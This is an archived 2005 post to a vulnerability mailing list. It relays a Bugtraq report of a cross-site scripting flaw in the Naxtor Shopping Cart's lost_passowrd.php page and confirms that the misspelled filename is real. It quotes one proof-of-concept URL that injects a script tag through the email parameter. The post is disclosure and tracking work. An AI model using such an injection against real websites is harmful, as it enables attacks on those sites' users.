[VIM] Naxtor Shopping Cart and lost_passowrd.php

security curmudgeon jericho at attrition.org
Wed Aug 3 07:09:21 EDT 2005

Previous message: [VIM] Errors and oddities in Phorum 5.0.11 XSS/SQl injection
Next message: [VIM] Combined Zen Cart issues
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

via bugtraq:

: Authors Site: http://www.naxtor.com.au/
: 
: XSS:
: 
: http://www.victim.com/lost_passowrd.php?&email=<script>var%20xss=31337;alert
: (xss);</script>&reset=reset

The demo linked off the vendor page has this as lost_passowrd.php, so this 
is *not* a typo =)

Previous message: [VIM] Errors and oddities in Phorum 5.0.11 XSS/SQl injection
Next message: [VIM] Combined Zen Cart issues
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

More information about the VIM mailing list